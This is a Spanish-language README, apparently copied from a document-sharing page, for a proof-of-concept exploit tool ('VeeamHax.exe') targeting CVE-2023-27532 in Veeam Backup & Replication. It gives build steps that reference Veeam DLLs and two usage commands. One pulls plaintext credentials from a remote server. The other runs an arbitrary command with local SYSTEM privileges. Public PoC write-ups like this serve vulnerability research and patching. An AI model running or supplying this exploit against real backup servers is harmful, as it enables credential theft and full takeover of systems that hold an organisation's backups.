Está en la página 1de 3

CVE-2023-27532

Código de prueba de concepto para explotar CVE-2023-27532 y filtrar


credenciales de texto sin formato o realizar la ejecución remota de
comandos.
Descripción general
Para obtener un análisis detallado de la vulnerabilidad y la explotación, lea
el Análisis Rapid7 AttackerKB .
Edificio
Abrir en Visual Studio. Deberá agregar o actualizar las referencias
a Veeam.Backup.Common.dll, Veeam.Backup.Interaction.MountService.dlly V
eeam.Backup.Model.dll. Para facilitar las cosas, instale Veeam Backup &
Replication en la máquina de desarrollo, aunque este no es un requisito
estricto.
Uso
Filtre las credenciales en texto plano del servidor remoto.
> VeeamHax.exe --target 192.168.0.100
Ejecute un comando arbitrario con privilegios del sistema local en el servidor
remoto.

> VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

También podría gustarte